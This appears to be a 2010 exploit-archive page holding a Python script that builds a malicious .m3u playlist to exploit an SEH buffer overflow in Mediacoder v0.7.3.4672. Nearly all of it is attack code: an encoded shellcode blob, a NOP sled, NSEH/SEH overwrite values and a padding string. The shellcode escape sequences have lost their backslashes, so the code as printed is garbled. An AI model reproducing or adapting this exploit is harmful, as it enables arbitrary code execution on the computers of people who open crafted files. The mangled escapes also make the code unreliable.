Mediacoder v0.7.3.4672 SEH Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Mediacoder v0.7.3.4672 SEH Exploit
# Published : 2010-05-31
# Author : Stoke
# Previous Title : Audio Converter 8.1 0day Stack Buffer Overflow PoC exploit ROP/WPM
# Next Title : IP2location.dll v1.0.0.1 Function Initialize() Buffer Overflow

#!/usr/bin/python
from sys import argv


##################################################################
# Title: Mediacoder v0.7.3.4672 SEH Exploit
# Author: Stoke from devilc0de crew
# http://hack2web.altervista.org
# http://devilc0de.altervista.org
# Tested on: Windows XP SP2 ita
##################################################################

shell = ("x89xe2xdbxcbxd9x72xf4x5bx53x59x49x49x49x49x49"
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a"
"x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32"
"x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49"
"x4bx4cx4ax48x4bx39x43x30x43x30x47x70x51x70x4f"
"x79x49x75x46x51x49x42x42x44x4ex6bx50x52x46x50"
"x4ex6bx43x62x44x4cx4ex6bx51x42x44x54x4cx4bx51"
"x62x44x68x46x6fx4ex57x51x5ax51x36x44x71x49x6f"
"x50x31x4fx30x4ex4cx45x6cx51x71x43x4cx43x32x46"
"x4cx45x70x4ax61x48x4fx46x6dx43x31x48x47x4dx32"
"x4ax50x42x72x46x37x4cx4bx43x62x46x70x4ex6bx51"
"x52x47x4cx45x51x48x50x4cx4bx51x50x50x78x4ex65"
"x49x50x50x74x51x5ax43x31x48x50x42x70x4cx4bx42"
"x68x45x48x4cx4bx43x68x45x70x46x61x48x53x4dx33"
"x45x6cx51x59x4ex6bx46x54x4ex6bx43x31x49x46x45"
"x61x49x6fx44x71x4bx70x4cx6cx4fx31x48x4fx44x4d"
"x46x61x4ax67x50x38x4dx30x42x55x49x64x46x63x51"
"x6dx4ax58x47x4bx51x6dx51x34x51x65x49x72x43x68"
"x4cx4bx42x78x51x34x46x61x4ex33x51x76x4ex6bx46"
"x6cx50x4bx4ex6bx43x68x47x6cx47x71x4ex33x4cx4b"
"x47x74x4cx4bx45x51x48x50x4dx59x43x74x47x54x51"
"x34x43x6bx43x6bx43x51x46x39x42x7ax50x51x4bx4f"
"x4bx50x43x68x51x4fx43x6ax4ex6bx45x42x48x6bx4e"
"x66x51x4dx51x7ax45x51x4ex6dx4ex65x48x39x43x30"
"x47x70x45x50x46x30x45x38x45x61x4cx4bx42x4fx4f"
"x77x4bx4fx49x45x4fx4bx48x70x48x35x4ex42x50x56"
"x50x68x4ex46x4ax35x4dx6dx4dx4dx4bx4fx4ax75x47"
"x4cx44x46x51x6cx46x6ax4dx50x49x6bx4dx30x43x45"
"x43x35x4fx4bx43x77x47x63x51x62x50x6fx42x4ax47"
"x70x50x53x49x6fx4ax75x45x33x50x61x42x4cx45x33"
"x44x6ex51x75x51x68x45x35x43x30x47x7ax41x41")

nops = "x90" * 30
seh = "xCBx10x44x01"
nseh = "xebx06x90x90"
evil = "A"*916 + nseh + seh + nops + shell
if len(argv) != 2:
    print "[+] Usage: ./mediacoder_exploit <filename.m3u>"
    quit()
 
fd = file(argv[1], "w")
print "[+] Writing %s" % (argv[1])
fd.write(evil)
print "[+] Exploit complete"
fd.close()